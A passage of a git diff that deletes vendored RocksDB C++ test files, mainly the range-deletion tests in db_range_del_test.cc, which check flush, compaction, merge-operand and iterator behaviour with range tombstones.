-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(200, oldest_key_time);
-
-  mock_env->set_current_time(550);
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_TRUE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                       &oldest_key_time));
-  ASSERT_EQ(300, oldest_key_time);
-
-  mock_env->set_current_time(650);
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel());
-  ASSERT_FALSE(dbfull()->GetIntProperty(DB::Properties::kEstimateOldestKeyTime,
-                                        &oldest_key_time));
-
-  // Close before mock_env destructs.
-  Close();
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_range_del_test.cc b/thirdparty/rocksdb/db/db_range_del_test.cc
deleted file mode 100644
index 982cbb8..0000000
--- a/thirdparty/rocksdb/db/db_range_del_test.cc
+++ /dev/null
@@ -1,1007 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class DBRangeDelTest : public DBTestBase {
- public:
-  DBRangeDelTest() : DBTestBase("/db_range_del_test") {}
-
-  std::string GetNumericStr(int key) {
-    uint64_t uint64_key = static_cast<uint64_t>(key);
-    std::string str;
-    str.resize(8);
-    memcpy(&str[0], static_cast<void*>(&uint64_key), 8);
-    return str;
-  }
-};
-
-// PlainTableFactory and NumTableFilesAtLevel() are not supported in
-// ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, NonBlockBasedTableNotSupported) {
-  if (!IsMemoryMappedAccessSupported()) {
-    return;
-  }
-  Options opts = CurrentOptions();
-  opts.table_factory.reset(new PlainTableFactory());
-  opts.prefix_extractor.reset(NewNoopTransform());
-  opts.allow_mmap_reads = true;
-  opts.max_sequential_skip_in_iterations = 999999;
-  Reopen(opts);
-
-  ASSERT_TRUE(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1", "dr1")
-          .IsNotSupported());
-}
-
-TEST_F(DBRangeDelTest, FlushOutputHasOnlyRangeTombstones) {
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1",
-                             "dr2"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-}
-
-TEST_F(DBRangeDelTest, CompactionOutputHasOnlyRangeTombstone) {
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z");
-  db_->Flush(FlushOptions());
-
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-  ASSERT_EQ(0, TestGetTickerCount(opts, COMPACTION_RANGE_DEL_DROP_OBSOLETE));
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, CompactionOutputFilesExactlyFilled) {
-  // regression test for exactly filled compaction output files. Previously
-  // another file would be generated containing all range deletions, which
-  // could invalidate the non-overlapping file boundary invariant.
-  const int kNumPerFile = 4, kNumFiles = 2, kFileBytes = 9 << 10;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = 2;
-  options.target_file_size_base = kFileBytes;
-  BlockBasedTableOptions table_options;
-  table_options.block_size_deviation = 50;  // each block holds two keys
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0), Key(1));
-
-  Random rnd(301);
-  for (int i = 0; i < kNumFiles; ++i) {
-    std::vector<std::string> values;
-    // Write 12K (4 values, each 3K)
-    for (int j = 0; j < kNumPerFile; j++) {
-      values.push_back(RandomString(&rnd, 3 << 10));
-      ASSERT_OK(Put(Key(i * kNumPerFile + j), values[j]));
-      if (j == 0 && i > 0) {
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-    }
-  }
-  // put extra key to trigger final flush
-  ASSERT_OK(Put("", ""));
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ(kNumFiles, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(2, NumTableFilesAtLevel(1));
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, MaxCompactionBytesCutsOutputFiles) {
-  // Ensures range deletion spanning multiple compaction output files that are
-  // cut by max_compaction_bytes will have non-overlapping key-ranges.
-  // https://github.com/facebook/rocksdb/issues/1778
-  const int kNumFiles = 2, kNumPerFile = 1 << 8, kBytesPerVal = 1 << 12;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.disable_auto_compactions = true;
-  opts.level0_file_num_compaction_trigger = kNumFiles;
-  opts.max_compaction_bytes = kNumPerFile * kBytesPerVal;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  // Want max_compaction_bytes to trigger the end of compaction output file, not
-  // target_file_size_base, so make the latter much bigger
-  opts.target_file_size_base = 100 * opts.max_compaction_bytes;
-  Reopen(opts);
-
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // It spans the whole key-range, thus will be included in all output files
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                             GetNumericStr(0),
-                             GetNumericStr(kNumFiles * kNumPerFile - 1)));
-  Random rnd(301);
-  for (int i = 0; i < kNumFiles; ++i) {
-    std::vector<std::string> values;
-    // Write 1MB (256 values, each 4K)
-    for (int j = 0; j < kNumPerFile; j++) {
-      values.push_back(RandomString(&rnd, kBytesPerVal));
-      ASSERT_OK(Put(GetNumericStr(kNumPerFile * i + j), values[j]));
-    }
-    // extra entry to trigger SpecialSkipListFactory's flush
-    ASSERT_OK(Put(GetNumericStr(kNumPerFile), ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-  }
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow_trivial_move */);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_GE(NumTableFilesAtLevel(1), 2);
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-
-  for (size_t i = 0; i < files[1].size() - 1; ++i) {
-    ASSERT_TRUE(InternalKeyComparator(opts.comparator)
-                    .Compare(files[1][i].largest, files[1][i + 1].smallest) <
-                0);
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, SentinelsOmittedFromOutputFile) {
-  // Regression test for bug where sentinel range deletions (i.e., ones with
-  // sequence number of zero) were included in output files.
-  // snapshot protects range tombstone from dropping due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // gaps between ranges creates sentinels in our internal representation
-  std::vector<std::pair<std::string, std::string>> range_dels = {{"a", "b"}, {"c", "d"}, {"e", "f"}};
-  for (const auto& range_del : range_dels) {
-    ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                               range_del.first, range_del.second));
-  }
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-  ASSERT_GT(files[0][0].smallest_seqno, 0);
-
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, FlushRangeDelsSameStartKey) {
-  db_->Put(WriteOptions(), "b1", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "c"));
-  db_->Put(WriteOptions(), "b2", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "b"));
-  // first iteration verifies query correctness in memtable, second verifies
-  // query correctness for a single SST file
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      ASSERT_OK(db_->Flush(FlushOptions()));
-      ASSERT_EQ(1, NumTableFilesAtLevel(0));
-    }
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), "b1", &value).IsNotFound());
-    ASSERT_OK(db_->Get(ReadOptions(), "b2", &value));
-  }
-}
-
-TEST_F(DBRangeDelTest, CompactRangeDelsSameStartKey) {
-  db_->Put(WriteOptions(), "unused", "val");  // prevents empty after compaction
-  db_->Put(WriteOptions(), "b1", "val");
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "c"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "b"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_EQ(3, NumTableFilesAtLevel(0));
-
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                                  true /* disallow_trivial_move */);
-      ASSERT_EQ(0, NumTableFilesAtLevel(0));
-      ASSERT_EQ(1, NumTableFilesAtLevel(1));
-    }
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), "b1", &value).IsNotFound());
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBRangeDelTest, FlushRemovesCoveredKeys) {
-  const int kNum = 300, kRangeBegin = 50, kRangeEnd = 250;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  Reopen(opts);
-
-  // Write a third before snapshot, a third between snapshot and tombstone, and
-  // a third after the tombstone. Keys older than snapshot or newer than the
-  // tombstone should be preserved.
-  const Snapshot* snapshot = nullptr;
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 3) {
-      snapshot = db_->GetSnapshot();
-    } else if (i == 2 * kNum / 3) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  db_->Flush(FlushOptions());
-
-  for (int i = 0; i < kNum; ++i) {
-    ReadOptions read_opts;
-    read_opts.ignore_range_deletions = true;
-    std::string value;
-    if (i < kRangeBegin || i > kRangeEnd || i < kNum / 3 || i >= 2 * kNum / 3) {
-      ASSERT_OK(db_->Get(read_opts, GetNumericStr(i), &value));
-    } else {
-      ASSERT_TRUE(db_->Get(read_opts, GetNumericStr(i), &value).IsNotFound());
-    }
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-// NumTableFilesAtLevel() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, CompactionRemovesCoveredKeys) {
-  const int kNumPerFile = 100, kNumFiles = 4;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.disable_auto_compactions = true;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  opts.num_levels = 2;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  for (int i = 0; i < kNumFiles; ++i) {
-    if (i > 0) {
-      // range tombstone covers first half of the previous file
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr((i - 1) * kNumPerFile),
-                       GetNumericStr((i - 1) * kNumPerFile + kNumPerFile / 2));
-    }
-    // Make sure a given key appears in each file so compaction won't be able to
-    // use trivial move, which would happen if the ranges were non-overlapping.
-    // Also, we need an extra element since flush is only triggered when the
-    // number of keys is one greater than SpecialSkipListFactory's limit.
-    // We choose a key outside the key-range used by the test to avoid conflict.
-    db_->Put(WriteOptions(), GetNumericStr(kNumPerFile * kNumFiles), "val");
-
-    for (int j = 0; j < kNumPerFile; ++j) {
-      db_->Put(WriteOptions(), GetNumericStr(i * kNumPerFile + j), "val");
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_GT(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ((kNumFiles - 1) * kNumPerFile / 2,
-            TestGetTickerCount(opts, COMPACTION_KEY_DROP_RANGE_DEL));
-
-  for (int i = 0; i < kNumFiles; ++i) {
-    for (int j = 0; j < kNumPerFile; ++j) {
-      ReadOptions read_opts;
-      read_opts.ignore_range_deletions = true;
-      std::string value;
-      if (i == kNumFiles - 1 || j >= kNumPerFile / 2) {
-        ASSERT_OK(
-            db_->Get(read_opts, GetNumericStr(i * kNumPerFile + j), &value));
-      } else {
-        ASSERT_TRUE(
-            db_->Get(read_opts, GetNumericStr(i * kNumPerFile + j), &value)
-                .IsNotFound());
-      }
-    }
-  }
-}
-
-TEST_F(DBRangeDelTest, ValidLevelSubcompactionBoundaries) {
-  const int kNumPerFile = 100, kNumFiles = 4, kFileBytes = 100 << 10;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.max_bytes_for_level_base = 2 * kFileBytes;
-  options.max_subcompactions = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = 3;
-  options.target_file_size_base = kFileBytes;
-  options.target_file_size_multiplier = 1;
-  Reopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 2; ++i) {
-    for (int j = 0; j < kNumFiles; ++j) {
-      if (i > 0) {
-        // delete [95,105) in two files, [295,305) in next two
-        int mid = (j + (1 - j % 2)) * kNumPerFile;
-        db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                         Key(mid - 5), Key(mid + 5));
-      }
-      std::vector<std::string> values;
-      // Write 100KB (100 values, each 1K)
-      for (int k = 0; k < kNumPerFile; k++) {
-        values.push_back(RandomString(&rnd, 990));
-        ASSERT_OK(Put(Key(j * kNumPerFile + k), values[k]));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put("", ""));
-      dbfull()->TEST_WaitForFlushMemTable();
-      if (j < kNumFiles - 1) {
-        // background compaction may happen early for kNumFiles'th file
-        ASSERT_EQ(NumTableFilesAtLevel(0), j + 1);
-      }
-      if (j == options.level0_file_num_compaction_trigger - 1) {
-        // When i == 1, compaction will output some files to L1, at which point
-        // L1 is not bottommost so range deletions cannot be compacted away. The
-        // new L1 files must be generated with non-overlapping key ranges even
-        // though multiple subcompactions see the same ranges deleted, else an
-        // assertion will fail.
-        //
-        // Only enable auto-compactions when we're ready; otherwise, the
-        // oversized L0 (relative to base_level) causes the compaction to run
-        // earlier.
-        ASSERT_OK(db_->EnableAutoCompaction({db_->DefaultColumnFamily()}));
-        dbfull()->TEST_WaitForCompact();
-        ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(),
-                                  {{"disable_auto_compactions", "true"}}));
-        ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-        ASSERT_GT(NumTableFilesAtLevel(1), 0);
-        ASSERT_GT(NumTableFilesAtLevel(2), 0);
-      }
-    }
-  }
-}
-
-TEST_F(DBRangeDelTest, ValidUniversalSubcompactionBoundaries) {
-  const int kNumPerFile = 100, kFilesPerLevel = 4, kNumLevels = 4;
-  Options options = CurrentOptions();
-  options.compaction_options_universal.min_merge_width = kFilesPerLevel;
-  options.compaction_options_universal.max_merge_width = kFilesPerLevel;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = kFilesPerLevel;
-  options.max_subcompactions = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  options.num_levels = kNumLevels;
-  options.target_file_size_base = kNumPerFile << 10;
-  options.target_file_size_multiplier = 1;
-  Reopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < kNumLevels - 1; ++i) {
-    for (int j = 0; j < kFilesPerLevel; ++j) {
-      if (i == kNumLevels - 2) {
-        // insert range deletions [95,105) in two files, [295,305) in next two
-        // to prepare L1 for later manual compaction.
-        int mid = (j + (1 - j % 2)) * kNumPerFile;
-        db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                         Key(mid - 5), Key(mid + 5));
-      }
-      std::vector<std::string> values;
-      // Write 100KB (100 values, each 1K)
-      for (int k = 0; k < kNumPerFile; k++) {
-        values.push_back(RandomString(&rnd, 990));
-        ASSERT_OK(Put(Key(j * kNumPerFile + k), values[k]));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put("", ""));
-      dbfull()->TEST_WaitForFlushMemTable();
-      if (j < kFilesPerLevel - 1) {
-        // background compaction may happen early for kFilesPerLevel'th file
-        ASSERT_EQ(NumTableFilesAtLevel(0), j + 1);
-      }
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-    ASSERT_GT(NumTableFilesAtLevel(kNumLevels - 1 - i), kFilesPerLevel - 1);
-  }
-  // Now L1-L3 are full, when we compact L1->L2 we should see (1) subcompactions
-  // happen since input level > 0; (2) range deletions are not dropped since
-  // output level is not bottommost. If no file boundary assertion fails, that
-  // probably means universal compaction + subcompaction + range deletion are
-  // compatible.
-  ASSERT_OK(dbfull()->RunManualCompaction(
-      reinterpret_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())
-          ->cfd(),
-      1 /* input_level */, 2 /* output_level */, 0 /* output_path_id */,
-      nullptr /* begin */, nullptr /* end */, true /* exclusive */,
-      true /* disallow_trivial_move */));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBRangeDelTest, CompactionRemovesCoveredMergeOperands) {
-  const int kNumPerFile = 3, kNumFiles = 3;
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(2 * kNumPerFile));
-  opts.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  opts.num_levels = 2;
-  Reopen(opts);
-
-  // Iterates kNumFiles * kNumPerFile + 1 times since flushing the last file
-  // requires an extra entry.
-  for (int i = 0; i <= kNumFiles * kNumPerFile; ++i) {
-    if (i % kNumPerFile == 0 && i / kNumPerFile == kNumFiles - 1) {
-      // Delete merge operands from all but the last file
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "key",
-                       "key_");
-    }
-    std::string val;
-    PutFixed64(&val, i);
-    db_->Merge(WriteOptions(), "key", val);
-    // we need to prevent trivial move using Puts so compaction will actually
-    // process the merge operands.
-    db_->Put(WriteOptions(), "prevent_trivial_move", "");
-    if (i > 0 && i % kNumPerFile == 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-  }
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  std::string expected, actual;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 45);  // 1+2+...+9
-  ASSERT_EQ(expected, actual);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  expected.clear();
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  uint64_t tmp;
-  Slice tmp2(actual);
-  GetFixed64(&tmp2, &tmp);
-  PutFixed64(&expected, 30);  // 6+7+8+9 (earlier operands covered by tombstone)
-  ASSERT_EQ(expected, actual);
-}
-
-// NumTableFilesAtLevel() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(DBRangeDelTest, ObsoleteTombstoneCleanup) {
-  // During compaction to bottommost level, verify range tombstones older than
-  // the oldest snapshot are removed, while others are preserved.
-  Options opts = CurrentOptions();
-  opts.disable_auto_compactions = true;
-  opts.num_levels = 2;
-  opts.statistics = CreateDBStatistics();
-  Reopen(opts);
-
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr1",
-                   "dr1");  // obsolete after compaction
-  db_->Put(WriteOptions(), "key", "val");
-  db_->Flush(FlushOptions());
-  const Snapshot* snapshot = db_->GetSnapshot();
-  db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "dr2",
-                   "dr2");  // protected by snapshot
-  db_->Put(WriteOptions(), "key", "val");
-  db_->Flush(FlushOptions());
-
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-  ASSERT_EQ(1, TestGetTickerCount(opts, COMPACTION_RANGE_DEL_DROP_OBSOLETE));
-
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, TableEvictedDuringScan) {
-  // The RangeDelAggregator holds pointers into range deletion blocks created by
-  // table readers. This test ensures the aggregator can still access those
-  // blocks even if it outlives the table readers that created them.
-  //
-  // DBIter always keeps readers open for L0 files. So, in order to test
-  // aggregator outliving reader, we need to have deletions in L1 files, which
-  // are opened/closed on-demand during the scan. This is accomplished by
-  // setting kNumRanges > level0_stop_writes_trigger, which prevents deletions
-  // from all lingering in L0 (there is at most one range deletion per L0 file).
-  //
-  // The first L1 file will contain a range deletion since its begin key is 0.
-  // SeekToFirst() references that table's reader and adds its range tombstone
-  // to the aggregator. Upon advancing beyond that table's key-range via Next(),
-  // the table reader will be unreferenced by the iterator. Since we manually
-  // call Evict() on all readers before the full scan, this unreference causes
-  // the reader's refcount to drop to zero and thus be destroyed.
-  //
-  // When it is destroyed, we do not remove its range deletions from the
-  // aggregator. So, subsequent calls to Next() must be able to use these
-  // deletions to decide whether a key is covered. This will work as long as
-  // the aggregator properly references the range deletion block.
-  const int kNum = 25, kRangeBegin = 0, kRangeEnd = 7, kNumRanges = 5;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.level0_file_num_compaction_trigger = 4;
-  opts.level0_stop_writes_trigger = 4;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  opts.num_levels = 2;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.block_cache = NewLRUCache(8 << 20);
-  opts.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  Reopen(opts);
-
-  // Hold a snapshot so range deletions can't become obsolete during compaction
-  // to bottommost level (i.e., L1).
-  const Snapshot* snapshot = db_->GetSnapshot();
-  for (int i = 0; i < kNum; ++i) {
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-    if (i > 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    if (i >= kNum / 2 && i < kNum / 2 + kNumRanges) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-  }
-  // Must be > 1 so the first L1 file can be closed before scan finishes
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(NumTableFilesAtLevel(1), 1);
-  std::vector<uint64_t> file_numbers = ListTableFiles(env_, dbname_);
-
-  ReadOptions read_opts;
-  auto* iter = db_->NewIterator(read_opts);
-  int expected = kRangeEnd;
-  iter->SeekToFirst();
-  for (auto file_number : file_numbers) {
-    // This puts table caches in the state of being externally referenced only
-    // so they are destroyed immediately upon iterator unreferencing.
-    TableCache::Evict(dbfull()->TEST_table_cache(), file_number);
-  }
-  for (; iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    ++expected;
-    // Keep clearing block cache's LRU so range deletion block can be freed as
-    // soon as its refcount drops to zero.
-    bbto.block_cache->EraseUnRefEntries();
-  }
-  ASSERT_EQ(kNum, expected);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromMutableMemtable) {
-  db_->Put(WriteOptions(), "key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromImmutableMemtable) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 3;
-  opts.min_write_buffer_number_to_merge = 2;
-  // SpecialSkipListFactory lets us specify maximum number of elements the
-  // memtable can hold. It switches the active memtable to immutable (flush is
-  // prevented by the above options) upon inserting an element that would
-  // overflow the memtable.
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "blah", "val");
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-}
-
-TEST_F(DBRangeDelTest, GetCoveredKeyFromSst) {
-  db_->Put(WriteOptions(), "key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-
-  ReadOptions read_opts;
-  std::string value;
-  ASSERT_TRUE(db_->Get(read_opts, "key", &value).IsNotFound());
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, GetCoveredMergeOperandFromMemtable) {
-  const int kNumMergeOps = 10;
-  Options opts = CurrentOptions();
-  opts.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  Reopen(opts);
-
-  for (int i = 0; i < kNumMergeOps; ++i) {
-    std::string val;
-    PutFixed64(&val, i);
-    db_->Merge(WriteOptions(), "key", val);
-    if (i == kNumMergeOps / 2) {
-      // deletes [0, 5]
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "key",
-                       "key_");
-    }
-  }
-
-  ReadOptions read_opts;
-  std::string expected, actual;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 30);  // 6+7+8+9
-  ASSERT_EQ(expected, actual);
-
-  expected.clear();
-  read_opts.ignore_range_deletions = true;
-  ASSERT_OK(db_->Get(read_opts, "key", &actual));
-  PutFixed64(&expected, 45);  // 0+1+2+...+9
-  ASSERT_EQ(expected, actual);
-}
-
-TEST_F(DBRangeDelTest, GetIgnoresRangeDeletions) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 4;
-  opts.min_write_buffer_number_to_merge = 3;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "sst_key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  db_->Put(WriteOptions(), "imm_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "mem_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  for (std::string key : {"sst_key", "imm_key", "mem_key"}) {
-    std::string value;
-    ASSERT_OK(db_->Get(read_opts, key, &value));
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, IteratorRemovesCoveredKeys) {
-  const int kNum = 200, kRangeBegin = 50, kRangeEnd = 150, kNumPerFile = 25;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
